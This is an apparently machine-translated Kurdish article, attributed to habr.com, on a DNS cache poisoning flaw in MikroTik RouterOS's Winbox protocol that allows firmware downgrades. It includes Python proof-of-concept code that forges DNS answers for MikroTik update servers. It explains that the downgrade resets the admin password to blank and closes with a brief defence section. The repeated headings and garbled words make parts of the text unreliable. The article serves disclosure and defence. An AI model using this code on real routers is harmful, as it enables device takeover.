Zehfbûna Backportê di RouterOS de bi sed hezaran cîhazan dixe xeterê

Zehfbûna Backportê di RouterOS de bi sed hezaran cîhazan dixe xeterê

Kapasîteya daxistina cîhazên ji dûr ve li ser bingeha RouterOS (Mikrotik) bi sed hezaran cîhazên torê dixe xeterê. Zehfbûn bi jehrîkirina cache DNS-ê ya protokola Winbox ve girêdayî ye û dihêle hûn firmware-ya kevnar (bi vesazkirina şîfreyek xwerû) an guhertî li ser cîhazê bar bikin.

Zehfbûna Backportê di RouterOS de bi sed hezaran cîhazan dixe xeterê

Agahiyên lawaziyê

Termînala RouterOS ji bo lêgerîna DNS fermana çareseriyê piştgirî dike.

Zehfbûna Backportê di RouterOS de bi sed hezaran cîhazan dixe xeterê

Ev daxwaz ji hêla binaryek bi navê çareserker ve tê rêve kirin. Resolver yek ji gelek binaryên ku bi protokola Winbox ya RouterOS ve girêdide ye. Di astek bilind de, "peyam"ên ku ji porta Winbox re têne şandin dikarin li ser bingeha nexşeyek jimare-based array li ser binaryên cihêreng ên RouterOS-ê werin rêve kirin.

Bi xwerû, RouterOS xwedan taybetmendiya servera DNS neçalak e.

Zehfbûna Backportê di RouterOS de bi sed hezaran cîhazan dixe xeterê

Lêbelê, tewra dema ku fonksiyona serverê neçalak be jî, router cache DNS-ya xwe diparêze.

Zehfbûna Backportê di RouterOS de bi sed hezaran cîhazan dixe xeterê

Dema ku em bi karanîna winbox_dns_request ji bo nimûne nimûne.com daxwazek çêbikin, router dê encamê cache bike.

Zehfbûna Backportê di RouterOS de bi sed hezaran cîhazan dixe xeterê

Ji ber ku em dikarin servera DNS-ê ya ku daxwaz jê re derbas dibe diyar bikin, têketina navnîşanên nerast ne hindik e. Mînakî, hûn dikarin ji pêkanîna serverek DNS-ê mîheng bikin Philip Klausda ku her dem bi tomarek A ku navnîşana IP-ya 192.168.88.250 tê de heye bersiv bide.

def dns_response(data):
    request = DNSRecord.parse(data)
    reply = DNSRecord(DNSHeader(
        id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
    qname = request.q.qname
    qn = str(qname)
    reply.add_answer(RR(qn,ttl=30,rdata=A("192.168.88.250")))
    print("---- Reply:n", reply)
    return reply.pack()

Naha heke hûn bi karanîna Winbox-ê li example.com-ê bigerin, hûn dikarin bibînin ku cache DNS-ya routerê jehrî ye.

Zehfbûna Backportê di RouterOS de bi sed hezaran cîhazan dixe xeterê

Bê guman, poisoning example.com ne pir bikêr e ji ber ku router bi rastî wê bikar neyîne. Lêbelê, pêdivî ye ku router bigihîje upgrade.mikrotik.com, cloud.mikrotik.com, cloud2.mikrotik.com û download.mikrotik.com. Û bi saya xeletiyeke din jî dibe ku meriv wan bi yekcarî jehrê bike.

def dns_response(data):
    request = DNSRecord.parse(data)
    reply = DNSRecord(DNSHeader(
        id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
    qname = request.q.qname
    qn = str(qname)
    reply.add_answer(RR(qn,ttl=30,rdata=A("192.168.88.250")))
    reply.add_answer(RR("upgrade.mikrotik.com",ttl=604800,
        rdata=A("192.168.88.250")))
    reply.add_answer(RR("cloud.mikrotik.com",ttl=604800,
        rdata=A("192.168.88.250")))
    reply.add_answer(RR("cloud2.mikrotik.com",ttl=604800,
        rdata=A("192.168.88.250")))
    reply.add_answer(RR("download.mikrotik.com",ttl=604800,
        rdata=A("192.168.88.250")))
    print("---- Reply:n", reply)
    return reply.pack()

Router yek destûrê daxwaz dike, û em pênc paşde didin. Router van bersivan rast cache nake.

Zehfbûna Backportê di RouterOS de bi sed hezaran cîhazan dixe xeterê

Eşkere ye, heke router wekî serverek DNS tevbigere, ev êrîş di heman demê de bikêr e, ji ber ku ew dihêle ku xerîdarên routerê werin êrîş kirin.

Ev êrîş di heman demê de destûrê dide te ku hûn qelsiyek cidîtir bikar bînin: guhertoya RouterOS-ê dakêşînin an paşde bikin. Êrîşkar mantiqa servera nûvekirinê, di nav de guheztin jî, ji nû ve diafirîne, û RouterOS neçar dike ku guhertoya kevnar (xerab) wekî heyî bibîne. Xetereya li vir di rastiyê de ye ku dema ku guhertoya "nûvekirî" ye, şîfreya rêveberê li nirxa xwerû tê vegerandin - êrîşkar dikare bi şîfreyek vala têkeve pergalê!


Tevî vê yekê jî êrîş bi bandor e nivîskar çend vektorên din pêk tîne, di nav de yên girêdayî bicîkirina derîyek paşîn di nav firmware de, lê ev jixwe teknîkek zêde ye û karanîna wê ji bo armancên neqanûnî neqanûnî ye.

parastina

Tenê neçalakkirina Winbox dihêle hûn xwe ji van êrîşan biparêzin. Tevî rehetiya rêveberiyê bi Winbox re, çêtir e ku hûn protokola SSH bikar bînin.

Source: www.habr.com

Add a comment